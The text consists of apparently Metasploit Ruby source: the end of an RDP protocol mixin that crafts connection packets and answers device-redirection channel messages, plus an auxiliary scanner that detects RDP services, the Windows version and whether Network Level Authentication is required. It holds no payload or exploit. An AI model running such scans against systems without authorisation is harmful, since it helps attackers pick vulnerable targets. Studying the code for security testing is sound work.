1283 |     keyboard_subtype: 0,
1284 |     keyboard_func_key: 12,
1285 |     serial_num: 0,
1286 |     client_product_id: 1,
1287 |     client_dig_product_id: "",
1288 |     selected_proto: 0
1289 |   )
1290 | 
1291 |     client_name = Rex::Text.to_unicode(client_name[0..16], 'utf-16le')
1292 |     client_dig_product_id = Rex::Text.to_unicode(client_dig_product_id[0..32], 'utf-16le')
1293 | 
1294 |     body = [
1295 |       [version, width, height].pack('<L<S<S'),
1296 |       "\x01\xca", # colour depth (8BPP)
1297 |       "\x03\xaa", # SASSequence
1298 |       [keyboard, client_build, client_name, keyboard_type].pack('<L<La32*'),
1299 |       [keyboard_type, keyboard_subtype, keyboard_func_key].pack('<L<L<L'),
1300 |       "\x00" * 64, # imeFileName
1301 |       "\x01\xca", # postBeta2ColorDepth (8BPP)
1302 |       [client_product_id, serial_num].pack('<S<L'),
1303 |       "\x18\x00", # highColorDepth: 24 bpp
1304 |       "\x07\x00", # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp )
1305 |       "\x01\x00", # earlyCapabilityFlags: 1 (RNS_UD_CS_SUPPORT_ERRINFO_PDU)
1306 |       [client_dig_product_id].pack('a64*'),
1307 |       "\x00", # connectionType: 0
1308 |       "\x00", # pad1octet
1309 |       # serverSelectedProtocol - After negotiating TLS or CredSSP this value must
1310 |       # match the selectedProtocol value from the server's Negotiate Connection
1311 |       # confirm PDU that was sent before encryption was started.
1312 |       [selected_proto].pack('L<')
1313 |     ].join('')
1314 | 
1315 |     result = [
1316 |       [0xc001, body.length + 4].pack('<S<S'),
1317 |       body
1318 |     ].join('')
1319 | 
1320 |     result
1321 |   end
1322 | 
1323 |   def conf_create_req(user_data_sets: 1, h221_key: "Duca")
1324 |     b2 = 0
1325 |     b2 |= 0x08 if user_data_sets > 0
1326 | 
1327 |     b5 = 0x40
1328 |     b5 |= 0x80 if user_data_sets > 0
1329 | 
1330 |     # TODO: add more flags here
1331 |     [
1332 |       "\x00",
1333 |       [b2].pack('C'),
1334 |       "\x00\x10\x00",
1335 |       [user_data_sets].pack('C'),
1336 |       [b5].pack('C'),
1337 |       "\x00",
1338 |       [h221_key.encode('ASCII')].pack('a*')
1339 |     ].join('')
1340 |   end
1341 | 
1342 |   def oid(itut, rec, t, t124, ver, desc)
1343 |     [(itut << 8) | rec, t, t124, ver, desc].pack('C*')
1344 |   end
1345 | 
1346 |   def ber_octet_string(*ds)
1347 |     result = [
1348 |       "\x04",
1349 |       ber_data(ds)
1350 |     ].join('')
1351 | 
1352 |     result
1353 |   end
1354 | 
1355 |   def ber_data(*ds)
1356 |     data = ds.join('')
1357 | 
1358 |     result = [
1359 |       "\x82",
1360 |       [data.length].pack('S>'),
1361 |       data
1362 |     ].join('')
1363 | 
1364 |     result
1365 |   end
1366 | 
1367 |   def ber_int(i)
1368 |     d = ''
1369 |     if i < (2 ** 8)
1370 |       d = [i].pack('C')
1371 |     elsif i < (2 ** 16)
1372 |       d = [i].pack('S>')
1373 |     else
1374 |       d = [i].pack('L>')
1375 |     end
1376 | 
1377 |     "\x02" + [d.length].pack('C') + d
1378 |   end
1379 | 
1380 |   def rdp_handle_packet(pkt)
1381 |     if pkt && pkt[0] == "\x03"
1382 |       if pkt[4..6] == "\x02\xf0\x80"
1383 |         if pkt[7] == "\x68"
1384 |           chan_user_id = pkt[8..9].unpack('S>')[0]
1385 |           chan_id = pkt[10..11].unpack('S>')[0]
1386 |           flags = pkt[18..21].unpack('<L')[0]
1387 |           data = pkt[22..pkt.length]
1388 |           rdp_on_channel_receive(pkt, chan_user_id, chan_id, flags, data)
1389 |         end
1390 |       end
1391 |     end
1392 |   end
1393 | 
1394 |   def rdp_on_channel_receive(pkt, chan_user_id, chan_id, flags, data)
1395 |     ctype = data[0..1].unpack('S')[0]
1396 | 
1397 |     if ctype == RDPConstants::RDPDR_CTYP_CORE
1398 |       opcode = data[2..3].unpack('S')[0]
1399 |       if opcode == RDPConstants::PAKID_CORE_SERVER_ANNOUNCE
1400 |         rdp_on_core_server_announce(pkt, chan_user_id, chan_id, flags, data)
1401 |       elsif opcode == RDPConstants::PAKID_CORE_SERVER_CAPABILITY
1402 |         rdp_on_core_server_capability(pkt, chan_user_id, chan_id, flags, data)
1403 |       elsif opcode == RDPConstants::PAKID_CORE_CLIENTID_CONFIRM
1404 |         rdp_on_core_client_id_confirm(pkt, chan_user_id, chan_id, flags, data)
1405 |       end
1406 |     end
1407 |   end
1408 | 
1409 |   def rdp_on_core_server_announce(pkt, chan_user_id, chan_id, flags, data)
1410 |     vprint_status("Handling SERVER ANNOUNCE ...")
1411 |     rdpdr_client_announce_reply(pkt, chan_user_id, chan_id, flags, data)
1412 |     rdpdr_client_name_request(pkt, chan_user_id, chan_id, flags, data)
1413 |   end
1414 | 
1415 |   def rdp_on_core_server_capability(pkt, chan_user_id, chan_id, flags, data)
1416 |     vprint_status("Handling SERVER CAPABILITY ...")
1417 |     # change opcode 1 byte to match server capabilities
1418 |     reply = [data[0..2], "\x43", data[4..data.length]].join('')
1419 | 
1420 |     rdp_send_channel(chan_user_id, chan_id, reply)
1421 |   end
1422 | 
1423 |   def rdp_on_core_client_id_confirm(pkt, chan_user_id, chan_id, flags, data)
1424 |     vprint_status("Handling CLIENT ID CONFIRM ...")
1425 |     rdpdr_client_device_list_announce_request(pkt, chan_user_id, chan_id, flags, data)
1426 |   end
1427 | 
1428 |   def rdpdr_client_device_list_announce_request(pkt, chan_user_id, chan_id, flags, data)
1429 |     reply = [
1430 |       RDPConstants::RDPDR_CTYP_CORE,
1431 |       RDPConstants::PAKID_CORE_DEVICELIST_ANNOUNCE,
1432 |       0x0, # Device count
1433 |     ].pack('SSL')
1434 | 
1435 |     rdp_send_channel(chan_user_id, chan_id, reply)
1436 |   end
1437 | 
1438 |   def rdpdr_client_announce_reply(pkt, chan_user_id, chan_id, flags, data)
1439 |     reply = [
1440 |       RDPConstants::RDPDR_CTYP_CORE,
1441 |       RDPConstants::PAKID_CORE_CLIENTID_CONFIRM,
1442 |       0x1, # Version Major
1443 |       0xc, # Version Minor
1444 |       0x2, # client ID (TODO: configure this? read it from the packet?
1445 |     ].pack('SSSSL')
1446 | 
1447 |     rdp_send_channel(chan_user_id, chan_id, reply)
1448 |   end
1449 | 
1450 |   def rdpdr_client_name_request(pkt, chan_user_id, chan_id, flags, data)
1451 |     computer_name = Rex::Text.to_unicode("#{@computer_name}\x00", 'utf-16le')
1452 |     reply = [
1453 |       RDPConstants::RDPDR_CTYP_CORE,
1454 |       RDPConstants::PAKID_CORE_CLIENT_NAME,
1455 |       0x1, # Unicode flag
1456 |       0x0, # Code Page
1457 |       computer_name.length,
1458 |       computer_name,
1459 |     ].pack('SSLLLa*')
1460 | 
1461 |     rdp_send_channel(chan_user_id, chan_id, reply)
1462 |   end
1463 | 
1464 |   attr_accessor :rdp_sock
1465 | 
1466 |   attr_accessor :rdp_user_id
1467 | 
1468 | =begin
1469 |   # debug stuff
1470 |   def rdp_to_file(b, del = false)
1471 |     p = "/tmp/ruby-full.bin"
1472 |     ::File.delete(p) if del && ::File.exist?(p)
1473 |     f = ::File.new(p, "ab")
1474 |     f.write(b)
1475 |     f.close
1476 |   end
1477 | =end
1478 | 
1479 | end
1480 | end
1481 | 


--------------------------------------------------------------------------------
/rdp_scanner.rb:
--------------------------------------------------------------------------------
  1 | ##
  2 | # This module requires Metasploit: https://metasploit.com/download
  3 | # Current source: https://github.com/rapid7/metasploit-framework
  4 | ##
  5 | 
  6 | class MetasploitModule < Msf::Auxiliary
  7 |   include Msf::Exploit::Remote::RDP
  8 |   include Msf::Auxiliary::Scanner
  9 |   include Msf::Auxiliary::Report
 10 | 
 11 |   def initialize(info = {})
 12 |     super(
 13 |       update_info(
 14 |         info,
 15 |         'Name'           => 'Identify endpoints speaking the Remote Desktop Protocol (RDP)',
 16 |         'Description'    => %q(
 17 |           This module attempts to connect to the specified Remote Desktop Protocol port
 18 |           and determines if it speaks RDP.
 19 | 
 20 |           When available, the Credential Security Support Provider (CredSSP) protocol will be used to identify the
 21 |           version of Windows on which the server is running. Enabling the DETECT_NLA option will cause a second
 22 |           connection to be made to the server to identify if Network Level Authentication (NLA) is required.
 23 |         ),
 24 |         'Author'         => 'Jon Hart <jon_hart[at]rapid7.com>',
 25 |         'References'     =>
 26 |           [
 27 |             ['URL', 'https://msdn.microsoft.com/en-us/library/cc240445.aspx']
 28 |           ],
 29 |         'License'        => MSF_LICENSE
 30 |       )
 31 |     )
 32 | 
 33 |     register_options(
 34 |       [
 35 |         Opt::RPORT(3389),
 36 |         OptBool.new('DETECT_NLA', [true, 'Detect Network Level Authentication (NLA)', true])
 37 |       ]
 38 |     )
 39 |   end
 40 | 
 41 |   def check_rdp
 42 |     begin
 43 |       rdp_connect
 44 |       is_rdp, version_info = rdp_fingerprint
 45 |     rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
 46 |       return false, nil
 47 |     ensure
 48 |       rdp_disconnect
 49 |     end
 50 | 
 51 |     service_info = nil
 52 |     if is_rdp
 53 |       product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'
 54 |       info = "Detected RDP on #{peer} (Windows version: #{product_version})"
 55 | 
 56 |       if datastore['DETECT_NLA']
 57 |         service_info = "Requires NLA: #{(!version_info[:product_version].nil? && requires_nla?) ? 'Yes' : 'No'}"
 58 |         info << " (#{service_info})"
 59 |       end
 60 | 
 61 |       print_status(info)
 62 |     end
 63 | 
 64 |     return is_rdp, service_info
 65 |   end
 66 | 
 67 |   def requires_nla?
 68 |     begin
 69 |       rdp_connect
 70 |       is_rdp, server_selected_proto = rdp_check_protocol
 71 |     rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
 72 |       return false
 73 |     ensure
 74 |       rdp_disconnect
 75 |     end
 76 | 
 77 |     return false unless is_rdp
 78 |     return [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto
 79 |   end
 80 | 
 81 |   def run_host(_ip)
 82 |     is_rdp = false
 83 |     begin
 84 |       rdp_connect
 85 |       is_rdp, service_info = check_rdp
 86 |     rescue Rex::ConnectionError => e
 87 |       vprint_error("Error while connecting and negotiating RDP: #{e}")
 88 |       return
 89 |     ensure
 90 |       rdp_disconnect
 91 |     end
 92 |     return unless is_rdp
 93 | 
 94 |     report_service(
 95 |       host: rhost,
 96 |       port: rport,
 97 |       proto: 'tcp',
 98 |       name: 'RDP',
 99 |       info: service_info
100 |     )
101 |   end
102 | end
103 | 


--------------------------------------------------------------------------------